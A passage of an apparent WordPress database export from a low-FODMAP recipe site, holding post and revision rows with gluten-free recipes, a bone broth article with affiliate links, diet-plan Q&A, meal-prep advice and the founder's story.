2. Arrange the tomatoes and cucumber on the watercress and spinach and sprinkle the spring onions on top

\n\n\n\n

3. Bring a pan of water to boil and gently place the eggs in for 6-7 minutes, once done set aside to cool

\n\n\n\n

4. Toast pine nuts in a dry frying pan and also set aside to cool

\n\n\n\n

5. Once cooled, peel the eggs from their shells and slice. Lay the sliced eggs on the salad, with twisted smoked salmon and sprinkle the pine nuts on top.

\n\n\n\n

6. To make the dressing: mix all the ingredients and drizzle over the salmon salad, then top with the fresh dill and tuck in...

\n\n\n\n
\"\"/
\n','Smoked Salmon Salad','','inherit','closed','closed','','4827-revision-v1','','','2020-04-05 21:02:57','2020-04-05 21:02:57','',4827,'http://tummyrevolution.com/4827-revision-v1/',0,'revision','',0),(4830,1,'2020-04-05 21:03:13','2020-04-05 21:03:13','\n

What could be better than a biscuit and a cup of tea???

We have called these our \'Dream Biscuits\', at Tummy Revolution.  They are a light, uplifting, crumbly biscuit that goes hand in hand with your drink of choice.

Since becoming low-fodmappers we have dramatically cut down on our sugars. Especially refined sugars and have substituted most of our naught treats with more heather options.  Having said that, we still miss our old treats from time to time, biscuits being one of them.

\n\n\n\n


In most of our cooking we try to substitute refined sugar and flour for more natural options like maple syrup, buckwheat or blown rice flour. When making these biscuits you can substitute the white sugar with coconut sugar and the rapeseed oil with coconut oil. Whether you choose to go down the white sugar or the coconut sugar route is up to you. All we can promise is you\'ll get some lovely biscuits either way. The white sugar biscuits are very light and lemony whilst the coconut sugar once have an almost caramel like flavour to them.  In terms of the flour, we stuck to \'Doves Gluten Free Flour Mix,\' as we thought the biscuits tasted best using this flour. We have made a few cakes and biscuits using other flours but we haven\'t been very impressed with the results and the taste has not been right for us.  One of our key principles is that we won\'t compromise on flavour so if something doesn\'t taste good we won\'t post it or suggest you make.

You won\'t be disappointed with the results here …just don\'t eat them all at once!

Ingredients

\n\n\n\n

Makes 20

\n\n\n\n

75g butter (room temperature)
150g sugar or 75g coconut sugar
60g rapeseed oil or coconut oil
1 tsp psyllium husk
1/2 tsp bicarbonate soda
1/2 lemon, grated peel and the juice
180g gluten free flour

Method

1. Set the oven to 160ºC
2. Place some baking paper on an oven tray
3. Mix the butter, sugar and oil together to form a sticky dough
4. Add the psyllium husk, lemon zest and bicarbonate soda
5. Squeeze in the juice of half a lemon and mix well
6. Finally, add the flour and mix until a dough is formed
7. Shape the dough into small balls and place on the oven tray (don\'t put them too close together, as they will spread out when being bakes so they need a bit of space)
8. Bake in the middle of the oven for 18-22 min, until slightly golden 

\n\n\n\n
\"dream
\n\n\n\n
\"\"/
\n','Dream Biscuits','','inherit','closed','closed','','4828-revision-v1','','','2020-04-05 21:03:13','2020-04-05 21:03:13','',4828,'http://tummyrevolution.com/4828-revision-v1/',0,'revision','',0),(4831,1,'2020-04-05 21:03:35','2020-04-05 21:03:35','\n

We\'re always on the hunt for good gluten free bread.  We find that home made bread always taste better then bought bread...

\n\n\n\n


These lovely pita breads went down a treat with our families. You can stuff them with all sorts of goodies; veggies, low fodmap pesto, or simply some good cheese. Alternatively, you can use it in a tasty fattoush, like we did. 

Now - these pitas can not be chucked together in a few minutes! They are not difficult to make but it just takes a little bit of time as they need to rise a couple of times. They are well worth it though as they are super tasty, so why not make them on a day when you are pottering about at home, as there will be plenty of time to do bits and bobs whilst the pitas are rising.

Ingredients 

\n\n\n\n

Makes 6 pitas

2 x 7g sachets of dried yeast
300ml warm water
1 ½ tsp maple syrup
1 ½ tsp fine sea salt
2 tbsp olive oil
90g brown rice flour
105g buckwheat flour
40g psyllium husk powder

Method

\n\n\n\n
  1. Add the yeast, maple syrup and olive oil to the warm water and stir well. In a separate bowl, mix all the dry ingredients.
  2. Combine the two bowls and stir with a spoon, until the mixture comes together as a dough. Then, use your hands to knead the dough for a couple of minutes, until it feels fairly smooth.
  3. Place the dough in a bowl, cover with cling film and leave somewhere warm for an hour until the dough has increased in size.
  4. Mould the dough into 6 small balls. On a floured surface, roll out the dough until each pitta is about ½ cm thick.
  5. Leave the breads on the floured surface and cover with cling film and preheat the oven to 250 ℃. Leave again for an hour to rise.
  6. Carefully, turn over each bread and place onto a baking sheet.
  7. Bake the pita breads for about 4 minutes on one side, then turn and bake for a further 2 minutes.
  8. Place breads on a wire rack to cool and then enjoy.
\n\n\n\n
\"\"/
\n','Pita Breads','','publish','open','open','','pita-breads','','','2020-04-06 23:42:11','2020-04-06 23:42:11','',0,'http://tummyrevolution.com/?p=4831',0,'post','',0),(4832,1,'2020-04-05 21:03:35','2020-04-05 21:03:35','\n

We\'re always on the hunt for good gluten free bread.  We find that home made bread always taste better then bought bread...

\n\n\n\n


These lovely pita breads went down a treat with our families. You can stuff them with all sorts of goodies; veggies, low fodmap pesto, or simply some good cheese. Alternatively, you can use it in a tasty fattoush, like we did. 

Now - these pitas can not be chucked together in a few minutes! They are not difficult to make but it just takes a little bit of time as they need to rise a couple of times. They are well worth it though as they are super tasty, so why not make them on a day when you are pottering about at home, as there will be plenty of time to do bits and bobs whilst the pitas are rising.

Ingredients 

\n\n\n\n

Makes 6 pitas

2 x 7g sachets of dried yeast
300ml warm water
1 ½ tsp maple syrup
1 ½ tsp fine sea salt
2 tbsp olive oil
90g brown rice flour
105g buckwheat flour
40g psyllium husk powder

Method

\n\n\n\n
  1. Add the yeast, maple syrup and olive oil to the warm water and stir well. In a separate bowl, mix all the dry ingredients.
  2. Combine the two bowls and stir with a spoon, until the mixture comes together as a dough. Then, use your hands to knead the dough for a couple of minutes, until it feels fairly smooth.
  3. Place the dough in a bowl, cover with cling film and leave somewhere warm for an hour until the dough has increased in size.
  4. Mould the dough into 6 small balls. On a floured surface, roll out the dough until each pitta is about ½ cm thick.
  5. Leave the breads on the floured surface and cover with cling film and preheat the oven to 250 ℃. Leave again for an hour to rise.
  6. Carefully, turn over each bread and place onto a baking sheet.
  7. Bake the pita breads for about 4 minutes on one side, then turn and bake for a further 2 minutes.
  8. Place breads on a wire rack to cool and then enjoy.
\n\n\n\n
\"\"/
\n','Pita Breads','','inherit','closed','closed','','4831-revision-v1','','','2020-04-05 21:03:35','2020-04-05 21:03:35','',4831,'http://tummyrevolution.com/4831-revision-v1/',0,'revision','',0),(5733,1,'2023-10-12 05:39:00','2023-10-12 05:39:00','\n

Bone broth is touted for its potential health benefits due to its rich nutritional profile. Here are some ways bone broth may positively impact your body:
(Skip to top 5 bone broths to buy online HERE)

\n\n\n\n
    \n
  1. Provides Essential Nutrients: Bone broth is made by simmering animal bones, connective tissues, and herbs. This process extracts essential nutrients, including collagen, gelatin, amino acids, minerals (such as calcium, magnesium, and phosphorus), and other compounds. These nutrients contribute to overall health and well-being.
  2. \n\n\n\n
  3. Supports Joint Health: Collagen, a protein abundant in bone broth, is a key component of connective tissues in the body, including joints. Consuming collagen-rich bone broth may help support joint health and potentially alleviate symptoms of conditions like osteoarthritis.
  4. \n\n\n\n
  5. Aids Digestive Health: The gelatin in bone broth may support digestive health by promoting the integrity of the gut lining. This can be beneficial for individuals with conditions like leaky gut syndrome. Additionally, the amino acids in bone broth, such as glycine and glutamine, may contribute to a healthy digestive system.
  6. \n\n\n\n
  7. May Boost the Immune System: The amino acids and minerals in bone broth, along with its potential anti-inflammatory effects, may contribute to a strengthened immune system. The nutrients in bone broth can support the production of immune cells and help the body defend against infections.
  8. \n\n\n\n
  9. Promotes Hydration: Bone broth is a liquid, and consuming it contributes to hydration. Staying adequately hydrated is essential for various bodily functions, including digestion, circulation, and temperature regulation.
  10. \n\n\n\n
  11. Supports Skin Health: Collagen is not only beneficial for joints but also for the skin. Consuming collagen-rich bone broth may contribute to improved skin elasticity and hydration, potentially reducing the appearance of wrinkles and promoting a more youthful complexion.
  12. \n\n\n\n
  13. A Source of Electrolytes: Bone broth contains minerals like potassium, sodium, and magnesium, which are essential electrolytes. These electrolytes play a crucial role in maintaining fluid balance, nerve function, and muscle contractions.
  14. \n\n\n\n
  15. May Aid Weight Loss: Some studies suggest that the protein content in bone broth, particularly gelatin, may promote feelings of fullness and satiety. Including bone broth in your diet may help control appetite and reduce overall calorie intake.
  16. \n
\n\n\n\n

It\'s important to note that while bone broth has potential health benefits, it should not be considered a cure-all, and its effects can vary among individuals. Moreover, the quality of the ingredients and the preparation method can influence the nutritional content of the broth. As with any dietary changes, it\'s advisable to consult with a healthcare professional or nutritionist for personalized advice based on your specific health needs and goals.

\n\n\n\n

Chick HERE for a Chicken and Beef Bone Broth recipe OR You can buy these Bone Broths online by following the links :

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.
TOP 5 BONE BROTH AVAILABLE ONLINE

\n\n\n\n

Chicken Bone Broth Soup by Kettle and Fire, Keto Diet, Paleo Friendly, Gluten Free, 16.9 Ounce (Pack of 6)

\n\n\n\n\"\"\n\n\n\n

Bare Bones Bone Broth Instant Powdered Mix, Beef, Pack of 16, 15g Sticks, 10g Protein, 100% Grass Fed, Keto & Paleo Friendly Bone Broth Packets

\n\n\n\n\"\"\n\n\n\n


Dr. Kellyann Bone Broth Packets, Original Homestyle Flavor - 7 Servings, Chicken Broth with 100% Grass-fed Hydrolyzed Collagen Peptides Powder, 16g Protein, Keto and Paleo Diet Friendly

\n\n\n\n\"\"\n\n\n\n

Kitchen Basics Original Chicken Bone Broth, 8.25 oz (Pack of 12)

\n\n\n\n\"\"\n\n\n\n

Pacific Foods Organic Chicken Bone Broth, 8oz (Pack of 12)

\n\n\n\n\"\"\n','What does Bone Broth do to your Body','','inherit','closed','closed','','5730-revision-v1','','','2023-10-12 05:39:00','2023-10-12 05:39:00','',5730,'https://tummyrevolution.com/?p=5733',0,'revision','',0),(4834,1,'2020-04-05 21:08:43','2020-04-05 21:08:43','\n
\"\"/
\n\n\n\n

Q&A

\n\n\n\n

Who is the 7-day Tummy Taming plan for?
Anyone with a troubling tummy who would like to feel better and healthier.

\n\n\n\n

Why should do the 7-day plan?
Why not! It\'s completely free with no catches and it will only make you feel better.
The 7-day plan is a beginners guide to understanding how food can affect, heal and nourish your tummy and ultimately your whole body and mind.
If you love the plan a more detailed 21 day plan will be available soon - watch this space!

\n\n\n\n

Can other family members eat the food in the plan?
Yes, the food is healthy, well balanced and safe for the whole family to eat.

\n\n\n\n

What should I consider before going on the 7-day plan?
As with any diet, it\'s a good idea to make sure that your symptoms are not caused by any other underlying health problems and your GP can help you with any concerns you might have.
For people suffering with severe IBS we recommend that you work together with a FODMAP trained dietitian that can look at your specific needs and support you during the plan.

\n\n\n\n

\n','Are you ready','','publish','closed','closed','','are-you-ready','','','2020-04-05 21:08:44','2020-04-05 21:08:44','',0,'http://tummyrevolution.com/?page_id=4834',0,'page','',0),(4836,1,'2020-04-05 21:08:43','2020-04-05 21:08:43','\n
\"\"/
\n\n\n\n

Q&A

\n\n\n\n

Who is the 7-day Tummy Taming plan for?
Anyone with a troubling tummy who would like to feel better and healthier.

\n\n\n\n

Why should do the 7-day plan?
Why not! It\'s completely free with no catches and it will only make you feel better.
The 7-day plan is a beginners guide to understanding how food can affect, heal and nourish your tummy and ultimately your whole body and mind.
If you love the plan a more detailed 21 day plan will be available soon - watch this space!

\n\n\n\n

Can other family members eat the food in the plan?
Yes, the food is healthy, well balanced and safe for the whole family to eat.

\n\n\n\n

What should I consider before going on the 7-day plan?
As with any diet, it\'s a good idea to make sure that your symptoms are not caused by any other underlying health problems and your GP can help you with any concerns you might have.
For people suffering with severe IBS we recommend that you work together with a FODMAP trained dietitian that can look at your specific needs and support you during the plan.

\n\n\n\n

\n','Are you ready','','inherit','closed','closed','','4834-revision-v1','','','2020-04-05 21:08:43','2020-04-05 21:08:43','',4834,'http://tummyrevolution.com/4834-revision-v1/',0,'revision','',0),(4837,1,'2020-04-05 21:10:37','2020-04-05 21:10:37','\n

…..come to those who sign up for our emails.

\n\n\n\n

Get new delicious tummy recipes, tips and updates.

\n\n\n\n

Want to feel great? join us! \n\n

\n','GOOD THINGS','','publish','closed','closed','','good-things','','','2020-04-05 21:10:38','2020-04-05 21:10:38','',0,'http://tummyrevolution.com/?page_id=4837',0,'page','',0),(4838,1,'2020-04-05 21:10:00','2020-04-05 21:10:00','\n

\n\nPreparation is key to success so before starting the low-FODMAP diet it\'s worth taking some time to get ready.

\n\n\n\n

Preparing a one week meal plan is a good way to start as it will give you a better idea of what you need to buy when you go shopping. Our shopping list will also help you get ideas of what foods to buy. You will probably find that you need to add a few things in your food cupboard and fridge but if you do weekly meal plans you can make gradual changes adding new foods, products and ingredients etc week by week. Make sure to include some snacks and treats so you don\'t fall on that hurdle.

\n\n\n\n

We try to make our recipes as nutritious as possible and you can incorporate these in your diet plan. If you need further help with your meal plans there are some good books and websites out there. Monash University\'s Low-FODMAP diet App is also a great source for information and you can find a link to this App, books and websites under \"what is FODMAPs\"

\n\n\n\n

When making your first meal plan you might want to look at what you normally eat and make small and simple changes. Finding substitutes or an alternative to what you normally eat is a good way of easing your way into the low-FODMAP diet.
For example - If you start your day with cereal and milk you can choose cornflakes with lactose free milk instead. If you eat toast with honey you can swap this for gluten free bread with butter and jam, cheese or peanut butter.

\n\n\n\n

Just remember that your meals need to be nutritious and contain enough vitamins, fibre and proteins for you to stay healthy.

\n\n\n\n

Once you get used to the low-FODMAP diet you might want to be a bit more adventurous with your meals trying different and new foods enriching your diet and health.

\n\n\n\n

Prep cooking on a Sunday
Lunch is the meal the we find most challenging as you\'re not always at home.
Taking some time every Sunday to cook food that can be used to make up lunches during the week is a really good idea. Believe us, you\'ll be glad you\'ve done it.

\n\n\n\n

Below are some examples of what you can cook and store in the fridge & freeze ready to use for lunch and in some cases also dinner.
Quinoa - make a batch, refrigerate and use it in salads or with meat dishes
Potatoes/new potatoes - great for salads and other dishes.
Gluten free pasta - you can have this with a home made tomato sauce or in salads.
Roasted vegetables - it\'s so simple to roast vegetables and they will go with almost anything. Try, carrots, parsnip, aubergine, courgette, potato, squash or turnip.
Eggs - boil a few eggs to have in your salad or on their own.
Roasted or cooked meat - If you for example cook a chicken or roast a ham joint, you have beautiful, unprocessed meat for the whole week. You can also freeze it in portions to use as and when you need it. We\'ve done a post on how to cook a chicken and get stock at the same time here
Stock - Most bought stock contains onion and is therefore no good if you\'re on the low-FODMAP diet. Making your own is therefore the best option.
You can use the stock for soups, risottos, stews, sauces etc. Again you can read our post on how to cook a chicken and stock for tips.
Bread - We both agree that gluten free bread from the shop is ok but not great. Nothing tastes as good as your own homemade bread and it\'s not as hard as you might think. We luuuuve this bread
Baking - If you have time and like baking, you\'ll never regret making some biscuits or cake for yourself. Our favourite is chocolate brownies

\n\n\n\n

Many of our lunch and dinner recipes are made up using one or more of the things listed above. We know by experience that having these ready for the week will make your life so much easier.

\n\n\n\n

Snacks
If you like a sweet treat we strongly recommend you have some snack substitutes ready in the cupboard for when the urge arises.
Here are our favourites

\n\n\n\n

Dark Chocolate - a few squares of good, high quality dark chocolate has been our saviour. We love it with a small cup of coffee or peppermint tea.
Nuts - a handful of nuts such as almonds, hazelnuts or walnuts are nice and easy to have in between meals.
Lactose free, almond or coconut yogurt with a little bit of fruit and some nuts. Please make sure the fruit is low-fodmap fruit.
Gluten free crisp bread with peanut butter and a few slices of banana
Small portions of low-FODMAP fruit.
Smoothies - bear in mind that you can only have one serving of fruit per meal so instead have smoothies that mainly contain ingredients such as vegetables, nuts, almond milk, raw cacao, vanilla pod and then add a little bit of fruit. See this post about our favourite green smoothie for some inspiration.We\'ve made a shopping list of things we\'d recommend getting before starting the low -FODMAP diet. These are things we eat and use regularly when cooking. We all have different taste in foods so you will probably need to customise it to
Wierd and wonderful products and ingredients

\n\n\n\n

Some of the products we use may be new to you such as buckwheat flour, rice flour, coconut oil & yogurt, rice syrup, psyllium husk powder etc. But there is no need to panic
before starting the low-FODMAP diet these were new to us too. Our research into better health lead us to using these products as they are natural and unrefined - much better for us. We also found it has enhanced our cooking, enabling us to make some amazing tasting dishes.If you want to try these products that we recommend, buying one or two to start off with and then increase as and when you become more confident with the changes of the low-FODMAP diet (we want to ease you in gently). We ordered most of our products and ingredients online but we also found some in health stores such as Holland and Barret.\n\n

\n','How to get started','','publish','closed','closed','','how-to-get-started','','','2020-04-05 21:10:01','2020-04-05 21:10:01','',0,'http://tummyrevolution.com/?page_id=4838',0,'page','',0),(4839,1,'2020-04-05 21:10:00','2020-04-05 21:10:00','\n

\n\nPreparation is key to success so before starting the low-FODMAP diet it\'s worth taking some time to get ready.

\n\n\n\n

Preparing a one week meal plan is a good way to start as it will give you a better idea of what you need to buy when you go shopping. Our shopping list will also help you get ideas of what foods to buy. You will probably find that you need to add a few things in your food cupboard and fridge but if you do weekly meal plans you can make gradual changes adding new foods, products and ingredients etc week by week. Make sure to include some snacks and treats so you don\'t fall on that hurdle.

\n\n\n\n

We try to make our recipes as nutritious as possible and you can incorporate these in your diet plan. If you need further help with your meal plans there are some good books and websites out there. Monash University\'s Low-FODMAP diet App is also a great source for information and you can find a link to this App, books and websites under \"what is FODMAPs\"

\n\n\n\n

When making your first meal plan you might want to look at what you normally eat and make small and simple changes. Finding substitutes or an alternative to what you normally eat is a good way of easing your way into the low-FODMAP diet.
For example - If you start your day with cereal and milk you can choose cornflakes with lactose free milk instead. If you eat toast with honey you can swap this for gluten free bread with butter and jam, cheese or peanut butter.

\n\n\n\n

Just remember that your meals need to be nutritious and contain enough vitamins, fibre and proteins for you to stay healthy.

\n\n\n\n

Once you get used to the low-FODMAP diet you might want to be a bit more adventurous with your meals trying different and new foods enriching your diet and health.

\n\n\n\n

Prep cooking on a Sunday
Lunch is the meal the we find most challenging as you\'re not always at home.
Taking some time every Sunday to cook food that can be used to make up lunches during the week is a really good idea. Believe us, you\'ll be glad you\'ve done it.

\n\n\n\n

Below are some examples of what you can cook and store in the fridge & freeze ready to use for lunch and in some cases also dinner.
Quinoa - make a batch, refrigerate and use it in salads or with meat dishes
Potatoes/new potatoes - great for salads and other dishes.
Gluten free pasta - you can have this with a home made tomato sauce or in salads.
Roasted vegetables - it\'s so simple to roast vegetables and they will go with almost anything. Try, carrots, parsnip, aubergine, courgette, potato, squash or turnip.
Eggs - boil a few eggs to have in your salad or on their own.
Roasted or cooked meat - If you for example cook a chicken or roast a ham joint, you have beautiful, unprocessed meat for the whole week. You can also freeze it in portions to use as and when you need it. We\'ve done a post on how to cook a chicken and get stock at the same time here
Stock - Most bought stock contains onion and is therefore no good if you\'re on the low-FODMAP diet. Making your own is therefore the best option.
You can use the stock for soups, risottos, stews, sauces etc. Again you can read our post on how to cook a chicken and stock for tips.
Bread - We both agree that gluten free bread from the shop is ok but not great. Nothing tastes as good as your own homemade bread and it\'s not as hard as you might think. We luuuuve this bread
Baking - If you have time and like baking, you\'ll never regret making some biscuits or cake for yourself. Our favourite is chocolate brownies

\n\n\n\n

Many of our lunch and dinner recipes are made up using one or more of the things listed above. We know by experience that having these ready for the week will make your life so much easier.

\n\n\n\n

Snacks
If you like a sweet treat we strongly recommend you have some snack substitutes ready in the cupboard for when the urge arises.
Here are our favourites

\n\n\n\n

Dark Chocolate - a few squares of good, high quality dark chocolate has been our saviour. We love it with a small cup of coffee or peppermint tea.
Nuts - a handful of nuts such as almonds, hazelnuts or walnuts are nice and easy to have in between meals.
Lactose free, almond or coconut yogurt with a little bit of fruit and some nuts. Please make sure the fruit is low-fodmap fruit.
Gluten free crisp bread with peanut butter and a few slices of banana
Small portions of low-FODMAP fruit.
Smoothies - bear in mind that you can only have one serving of fruit per meal so instead have smoothies that mainly contain ingredients such as vegetables, nuts, almond milk, raw cacao, vanilla pod and then add a little bit of fruit. See this post about our favourite green smoothie for some inspiration.We\'ve made a shopping list of things we\'d recommend getting before starting the low -FODMAP diet. These are things we eat and use regularly when cooking. We all have different taste in foods so you will probably need to customise it to
Wierd and wonderful products and ingredients

\n\n\n\n

Some of the products we use may be new to you such as buckwheat flour, rice flour, coconut oil & yogurt, rice syrup, psyllium husk powder etc. But there is no need to panic
before starting the low-FODMAP diet these were new to us too. Our research into better health lead us to using these products as they are natural and unrefined - much better for us. We also found it has enhanced our cooking, enabling us to make some amazing tasting dishes.If you want to try these products that we recommend, buying one or two to start off with and then increase as and when you become more confident with the changes of the low-FODMAP diet (we want to ease you in gently). We ordered most of our products and ingredients online but we also found some in health stores such as Holland and Barret.\n\n

\n','How to get started','','inherit','closed','closed','','4838-revision-v1','','','2020-04-05 21:10:00','2020-04-05 21:10:00','',4838,'http://tummyrevolution.com/4838-revision-v1/',0,'revision','',0),(4840,1,'2020-04-05 21:10:37','2020-04-05 21:10:37','\n

…..come to those who sign up for our emails.

\n\n\n\n

Get new delicious tummy recipes, tips and updates.

\n\n\n\n

Want to feel great? join us! \n\n

\n','GOOD THINGS','','inherit','closed','closed','','4837-revision-v1','','','2020-04-05 21:10:37','2020-04-05 21:10:37','',4837,'http://tummyrevolution.com/4837-revision-v1/',0,'revision','',0),(4841,1,'2020-04-05 21:11:17','2020-04-05 21:11:17','\n
\"\"/
\n\n\n\n

There has been a significant increase in the number of people excluding gluten from their diet in recent years. You have probably noticed how supermarket stock more and more gluten free products, accommodating for not only people with celiac but also a rapidly growing number of people with non-celiac gluten-sensitivity (NCGS). People with NCGS suffer with symptoms such as gas, cramps, bloating, or diarrhea if the consume gluten and going gluten free simply means they feel much better.

But according to a recent article in Men\'s Journal, doctors are now seriously doubting whether NCGS is really all that common. A landmark from last year turned out some very convincing evidence that gluten may not be the culprit making so many people sick. Instead, it is likely a large class of carbohydrates called FODMAPs. This is something we here at Tummy Revolution have suspected for some time as it makes sense once you take a closer look at FODMAPs.

The thought that FODMAPs has a greater effect on many people\'s health then simply gluten alone is not new, but it seems to be gaining more momentum now which is good news. Many people are unfamiliar with FODMAPs and how they can affect some people so more studies and news like this is great . 

\n\n\n\n

You can read more about the research in an article by Mens Journal article here

\n','Gluten free diet or low FODMAP diet?','','publish','closed','closed','','gluten-free-diet-or-low-fodmap-diet','','','2020-04-05 21:11:17','2020-04-05 21:11:17','',0,'http://tummyrevolution.com/?page_id=4841',0,'page','',0),(4842,1,'2020-04-05 21:11:17','2020-04-05 21:11:17','\n
\"\"/
\n\n\n\n

There has been a significant increase in the number of people excluding gluten from their diet in recent years. You have probably noticed how supermarket stock more and more gluten free products, accommodating for not only people with celiac but also a rapidly growing number of people with non-celiac gluten-sensitivity (NCGS). People with NCGS suffer with symptoms such as gas, cramps, bloating, or diarrhea if the consume gluten and going gluten free simply means they feel much better.

But according to a recent article in Men\'s Journal, doctors are now seriously doubting whether NCGS is really all that common. A landmark from last year turned out some very convincing evidence that gluten may not be the culprit making so many people sick. Instead, it is likely a large class of carbohydrates called FODMAPs. This is something we here at Tummy Revolution have suspected for some time as it makes sense once you take a closer look at FODMAPs.

The thought that FODMAPs has a greater effect on many people\'s health then simply gluten alone is not new, but it seems to be gaining more momentum now which is good news. Many people are unfamiliar with FODMAPs and how they can affect some people so more studies and news like this is great . 

\n\n\n\n

You can read more about the research in an article by Mens Journal article here

\n','Gluten free diet or low FODMAP diet?','','inherit','closed','closed','','4841-revision-v1','','','2020-04-05 21:11:17','2020-04-05 21:11:17','',4841,'http://tummyrevolution.com/4841-revision-v1/',0,'revision','',0),(4843,1,'2020-04-05 21:11:53','2020-04-05 21:11:53','\n
\"\"/
\n','Delivery and Returns','','private','closed','closed','','delivery-and-returns','','','2020-04-27 10:16:31','2020-04-27 10:16:31','',0,'http://tummyrevolution.com/?page_id=4843',0,'page','',0),(4844,1,'2020-04-05 21:12:18','2020-04-05 21:12:18','\n

Advice, resources and recipes for happy tummies

\n','Cooking tummy friendly food for better health','','publish','closed','closed','','cooking-tummy-friendly-food-for-better-health','','','2020-04-05 21:12:21','2020-04-05 21:12:21','',0,'http://tummyrevolution.com/?page_id=4844',0,'page','',0),(4845,1,'2020-04-05 21:11:53','2020-04-05 21:11:53','\n
\"\"/
\n','Delivery and Returns','','inherit','closed','closed','','4843-revision-v1','','','2020-04-05 21:11:53','2020-04-05 21:11:53','',4843,'http://tummyrevolution.com/4843-revision-v1/',0,'revision','',0),(4846,1,'2020-04-05 21:12:34','2020-04-05 21:12:34','','coming soon','','publish','closed','closed','','coming-soon-2','','','2020-04-05 21:12:39','2020-04-05 21:12:39','',0,'http://tummyrevolution.com/?page_id=4846',0,'page','',0),(4847,1,'2020-04-05 21:12:18','2020-04-05 21:12:18','\n

Advice, resources and recipes for happy tummies

\n','Cooking tummy friendly food for better health','','inherit','closed','closed','','4844-revision-v1','','','2020-04-05 21:12:18','2020-04-05 21:12:18','',4844,'http://tummyrevolution.com/4844-revision-v1/',0,'revision','',0),(4848,1,'2020-04-05 21:12:34','2020-04-05 21:12:34','','coming soon','','inherit','closed','closed','','4846-revision-v1','','','2020-04-05 21:12:34','2020-04-05 21:12:34','',4846,'http://tummyrevolution.com/4846-revision-v1/',0,'revision','',0),(4850,1,'2020-04-05 21:18:41','2020-04-05 21:18:41','\n
\"\"
\n\n\n\n

Sign up to our newsletter for new recipes, advice and new releases

\n','Tummy Revolution','','publish','closed','closed','','tummy-revolution','','','2020-04-05 21:18:56','2020-04-05 21:18:56','',0,'http://tummyrevolution.com/?page_id=4850',0,'page','',0),(4852,1,'2020-04-05 21:19:50','2020-04-05 21:19:50','\n
\"\"/
\n','Seeds For Life','','publish','closed','closed','','seeds-for-life','','','2020-04-05 21:19:51','2020-04-05 21:19:51','',0,'http://tummyrevolution.com/?page_id=4852',0,'page','',0),(4853,1,'2020-04-05 21:18:41','2020-04-05 21:18:41','\n
\n\n\n\n

Sign up to our newsletter for new recipes, advice and new releases

\n','Tummy Revolution','','inherit','closed','closed','','4850-revision-v1','','','2020-04-05 21:18:41','2020-04-05 21:18:41','',4850,'http://tummyrevolution.com/4850-revision-v1/',0,'revision','',0),(4854,1,'2020-04-05 21:18:55','2020-04-05 21:18:55','\n
\"\"
\n\n\n\n

Sign up to our newsletter for new recipes, advice and new releases

\n','Tummy Revolution','','inherit','closed','closed','','4850-revision-v1','','','2020-04-05 21:18:55','2020-04-05 21:18:55','',4850,'http://tummyrevolution.com/4850-revision-v1/',0,'revision','',0),(4855,1,'2020-04-05 21:19:30','2020-04-05 21:19:30','','sign up','','publish','closed','closed','','sign-up','','','2020-04-05 21:19:30','2020-04-05 21:19:30','',0,'http://tummyrevolution.com/?page_id=4855',0,'page','',0),(4856,1,'2020-04-05 21:19:30','2020-04-05 21:19:30','','sign up','','inherit','closed','closed','','4855-revision-v1','','','2020-04-05 21:19:30','2020-04-05 21:19:30','',4855,'http://tummyrevolution.com/4855-revision-v1/',0,'revision','',0),(4857,1,'2020-04-05 21:19:50','2020-04-05 21:19:50','\n
\"\"/
\n','Seeds For Life','','inherit','closed','closed','','4852-revision-v1','','','2020-04-05 21:19:50','2020-04-05 21:19:50','',4852,'http://tummyrevolution.com/4852-revision-v1/',0,'revision','',0),(4858,1,'2020-04-05 21:21:10','2020-04-05 21:21:10','\n
\"\"/
\n','Seed Programs','','private','open','open','','seed-programs','','','2020-04-27 10:28:54','2020-04-27 10:28:54','',0,'http://tummyrevolution.com/?p=4858',0,'post','',0),(4859,1,'2020-04-05 21:21:10','2020-04-05 21:21:10','\n
\"\"/
\n','Seed Programs','','inherit','closed','closed','','4858-revision-v1','','','2020-04-05 21:21:10','2020-04-05 21:21:10','',4858,'http://tummyrevolution.com/4858-revision-v1/',0,'revision','',0),(4860,1,'2020-04-05 21:21:43','2020-04-05 21:21:43','\n

Who is the 7-day Tummy Taming plan for?Anyone with a troubling tummy who would like to feel better and healthier.Why should do the 7-day plan?Why not! It\'s completely free with no catches and it will only make you feel better.The 7-day plan is a beginners guide to understanding how food can affect, heal and nourish your tummy and ultimately your whole body and mind.
If you love the plan a more detailed 21 day plan will be available soon - watch this space!Can other family members eat the food in the plan?Yes, the food is healthy, well balanced and safe for the whole family to eat.What should I consider before going on the 7-day plan?As with any diet, it\'s a good idea to make sure that your symptoms are not caused by any other underlying health problems and your GP can help you with any concerns you might have.For people suffering with severe IBS we recommend that you work together with a FODMAP trained dietitian that can look at your specific needs and support you during the plan. \n\n

\n','Q&A','','publish','closed','closed','','qa','','','2020-04-05 21:21:44','2020-04-05 21:21:44','',0,'http://tummyrevolution.com/?page_id=4860',0,'page','',0),(4861,1,'2020-04-05 21:23:15','2020-04-05 21:23:15','\n

We hope you take happiness and health from our website and want to thank you for checking us out.

\n\n\n\n
\"\"/
\n\n\n\n

I’m Sara Chadwick, founder of Tummy Revolution and long-term sufferer of digestive troubles and IBS related symptoms.

I stumbled across the low-FODMAP diet during my personal research into better tummy health and it soon became clear this was the solution to all my tummy problems.  The low-FODMAP diet is more about finding out how your body breaks down food and how our tummies react to different food rather then a “diet” in the normal term. Once I had understood how my tummy reacted to different food and made adjustments to my diet, all my tummy problems disappeared and I now feel amazing! 

\n\n\n\n

Tummy Revolution came about as I knew there must be others like me out there suffering for years with no solution and little help.  Adjusting your lifestyle and making changes to your diet on your own can be a challenge and struggle for many.  I wanted Tummy Revolution to be a place where tummy sufferers could come for help to make changes to their own tummies and health in a new, exciting and fresh way.

\n\n\n\n

I don’t really didn\'t like the word \"diet\" as it just oozes limitation.  Instead I wanted to throw away any limitations and provide tummy sufferers with an exciting plan and challenge, which involved eating delicious tasting food that tummies love. 

\n\n\n\n

I’m now on a mission to revolutionise all tummies out there and to stop them behaving badly once and for all! The key to a happy tummy lies within each of us and we hope you can find inspiration at Tummy Revolution, to go on your own journey to find yours.

\n\n\n\n

Sara
xoxox

\n','Our Stories','','publish','closed','closed','','our-stories','','','2020-04-05 21:23:16','2020-04-05 21:23:16','',0,'http://tummyrevolution.com/?page_id=4861',0,'page','',0),(4862,1,'2020-04-05 21:21:43','2020-04-05 21:21:43','\n

